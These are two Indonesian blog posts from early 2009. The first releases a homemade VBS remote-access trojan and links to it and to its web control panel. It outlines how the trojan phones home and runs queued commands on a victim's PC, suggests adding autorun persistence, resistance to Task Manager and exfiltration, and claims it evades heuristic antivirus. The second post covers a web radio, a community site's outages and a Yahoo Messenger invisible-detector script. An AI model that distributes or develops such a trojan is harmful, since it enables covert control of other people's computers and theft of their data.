Sabtu, 31 Januari 2009

Membuat Trojan dengan Notepad?Hmm..mari kita coba

Saya baru saja mengulik isi harddisk lama dan ternyata menemukan proyek lama saya yang masih belum terselesaikan. Yap, kisaran Juli 2008 lalu saya menulis sebuah trojan berbasis web yang bertujuan untuk menunjukkan kekuatan notepad yang selama ini dipandang sebelah mata oleh user Windows.

Seperti yang telah diketahui, beberapa waktu lalu seseorang telah menyebar virus Tukul yang awalnya ditulis menggunakan notepad dengan bahasa VBS. Virus tersebut kemudian berkembang biak dan direnovasi oleh seseorang yang kemudian menyebarkannya menjadi bentuk virus exe yang jadi heboh.

Sekarang saya mencoba merilis kode yang pernah saya buat beberapa waktu lalu ini. Dan telah berhasil menjadi prototype trojan VBS yang ampuh untuk sekedar mendapatkan isi harddisk, atau running process di PC korban.


Well, sebenarnya trojan ini masi bisa dikembangkan lebih jauh secara professional, namun semua itu saya serahkan sepenuhnya kepada kalian.

Sekedar gambaran, alur trojan yang saya buat seperti ini :
- VBS di run di PC korban, lalu VBS akan menggunakan ajax untuk melaporkan diri beserta IPnya ke server
- Dari web kontrol panel (server), anda bisa melihat daftar IP yang telah terkena trojan dan melihat IP mana saja yang sedang aktif.
- Silahkan klik masuk untuk mengakses IP tersebut menggunakan Console dr Web
- Setelah masuk ke dalam console, anda bisa mengetikkan perintah2 yang telah ditulis di VBS tadi. Jadi disinilah kalian bisa mengembangkan fungsi - fungsi apa yang bisa dilakukan oleh si Trojan.
- Setiap command yang diberikan akan berstatus PENDING, dan ketika si Trojan aktif dia akan mendownload setiap perintah kemudian mengeksekusinya lalu melaporkan ke server.
- Command yang telah dieksekusi akan berubah status laporannya menjadi Done!

Maaf saya hanya menjelaskan sedikit disini karena terbatasnya waktu. Untuk mencoba lebih jauh silahkan download dan otak - atik sendiri trojan tersebut :

http://otewe.co.cc/trojanvbs -> save menjadi ekstensi .VBS

Kontrol Panel bisa diakses di :
http://otewe.co.cc/aksestrojanvbs

Silahkan berkreasi dengan ide anda, dan bertanggung jawablah atas semua yang anda lakukan.

NB:
+ untuk mengembangkannya cari tutorial dengan keyword "VBS SCRIPTING" dan "HTA SCRIPTING"

KELEMAHAN:
+ belum mengubah registry sehingga tidak akan autorun
+ masih gampang dibunuh menggunakan TASK MANAGER (gunakan trik virus TUKUL untuk mengakalinya)
+ belum dibuat fungsi untuk capture screen (coba kembangkan agar bisa mengirim email/upload file)

KELEBIHAN:
+ sangat jarang (baca: belum pernah) saya melihat trojan menggunakan VBS
+ antivirus tidak akan mendeteksi menggunakan heuristic scan selama anda tidak menggunakan fungsi VBS untuk menghapus FILE *CMIIW


Dilain waktu saya akan mencoba mengulas bagaimana membuat mailbox untuk YM sehingga tampak seperti PSYBNC di IRC..

*CHEERS

Senin, 26 Januari 2009

Saatnya rilis source code YM INVISIBLE DETECTOR

Akhirnya saya sempat mengupdate lagi blog ini di tahun 2009. Hmm, memang belakangan waktu saya tersita penuh untuk sebuah proyek bernama STONEDCOLLEGE, web radio online yang bertemakan sebagai sebuah kampus maya dengan para dosen kritis dan konyol. Radio yang di bangun bersama beberapa rekan sewaktu SMA dulu kini telah memiliki jadwal jam siar teratur langsung dari Studio Cinere, Pondok Indah dan Ciputat mulai dari jam 16:00 - 21:00 WIB.

Saya sangat berharap suatu waktu radio humor ini menjadi teman setia para blogger melakukan aktifitasnya sehari - hari di Internet. Dengan menggunakan collocation server di IIX yang berbandwith tinggi, semoga akses ke STONEDCOLLEGE.COM akan semakin mudah, cepat dan stabil.

Bergeser sedikit ke masalah Keluarga Blogpop, komunitas yang kita semua bangun ini sedang mengalami masa - masa apes. Hahahaha, bagaimana tidak? Sudah dua kali saya melakukan pindah server dari hostingannya pak donatur Panji Suharto sampai ke VPS Solaris saya. Awalnya gejala serangan SPAM dan DdoS yang cukup memberatkan kinerja server. Kemudian setelah saya sadari ternyata plugin WP-O-MATIC, plugin yang membuat situs Keluarga Blogpop bisa melakukan update setiap hari pun ikut - ikutan error. Serangan SPAM dan DdoS telah menghabiskan resource memory yang cukup tinggi sehingga membebani server ketika plugin WP-O-MATIC menjalankan tugasnya sehari - hari. Hal inilah yang memicu lambat dibukanya situs Keluarga Blogpop.

Apesnya lagi, setelah saya pindah server ke VPS Solaris pun terjadi masalah serupa. Ketika anti SPAM dan DdoS telah saya pasang, terjadi masalah di database Keluarga Blogpop. Alhasil, data member dan postinganannya pun terancam hilang. Inilah yang membuat saya memilih untuk mematikan server solaris untuk sementara waktu. Sehingga akibatnya situs Keluarga Blogpop pun tidak bisa diakses terlebih dahulu.

Dilain pihak, saya mendapat sebuah pesan dari Sersan Katim, seorang member Keluarga Blogpop. Beliau menawarkan kerjasama antara Keluarga Blogpop dan dalam penyediaan layanan forum. Sebuah kesempatan sekaligus kebetulan bukan?Beberapa waktu yang lalu saya sempat membahas masalah pembentukan forum Keluarga Blogpop untuk membenahi komunikasi antar member di Keluarga Blogpop. Namun karena satu dan lain hal saya belum sempat merealisasikan ide tersebut sampai kini.

Jadi untuk kalian Keluarga Blogpop yang telah memiliki account di Rumah Blogger, silahkan konfirmasikan ID kalian ke saya atau ke Sersan Katim. Kami akan meneruskan data kalian ke admin RumahBlogger.

Well, akhir kata saya hanya ingin mengucapkan maaf sebesar - besarnya atas beberapa kendala teknis yang sedang terjadi, seperti downnya situs Keluarga Blogpop,serta tidak bisa diaksesnya YM DETEKTOR karena filenya saya letakkan di SPUTNIXSHOP.COM dan kini telah expired.

Oh iya, sebagai janji saya yang terdahulu, saya akan memberikan kode asli isi dari YM DETEKTOR yang telah kalian gunakan. Silahkan kunjungi : http://bacadulu.co.cc/sourcecodeym untuk lebih detilnya.

Ym Detektor.php

*maap gak ngasih direct link, server gw lg down smua.hihihi.
untuk yg ngerti alur scriptnya tolong jangan ketawa yah..hahaahaha, namanya juga trik xP

Cheers!